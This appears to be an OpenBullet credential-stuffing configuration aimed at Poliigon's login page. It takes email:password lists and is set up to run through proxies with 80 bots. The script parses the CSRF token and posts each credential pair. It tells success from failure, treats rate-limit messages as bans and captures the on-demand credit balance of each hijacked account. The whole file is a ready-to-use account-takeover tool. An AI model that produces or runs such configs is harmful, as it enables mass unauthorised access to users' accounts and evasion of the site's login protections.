[SETTINGS]
{
  "Name": "Poliigon",
  "SuggestedBots": 80,
  "LastModified": "2018-05-30T17:00:00.9272433+00:00",
  "AdditionalInfo": "",
  "Author": "Secant",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#GET_Login REQUEST GET "https://www.poliigon.com/login" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
#PARSE_TOKEN PARSE "<SOURCE>" CSS "[name=_token]" "value" 0 -> VAR "TOKEN" "" "" 
#POST_Login REQUEST POST "https://www.poliigon.com/login" AutoRedirect=TRUE 
  CONTENT "_token=<TOKEN>&email=<USER>&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "referer: https://www.poliigon.com/login" 
  HEADER "origin: https://www.poliigon.com" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "These credentials do not match our records" 
  KEYCHAIN Success OR 
    KEY "account/dashboard" 
  KEYCHAIN Ban OR 
    KEY "Too many login attempts" 
#GET_Dashboard REQUEST GET "https://www.poliigon.com/account/dashboard" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "referer: https://www.poliigon.com/" 
#PARSE_Credits PARSE "<SOURCE>" LR "<span class=\"small\"><span class=\"blue\">On Demand</span></span> <br>
" "On-Demand Credits" Recursive=FALSE -> CAP "On-Demand Credits" "" "" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=FALSE 
  KEYCHAIN CUSTOM "FREE" OR 
    KEY "Get Started!" 
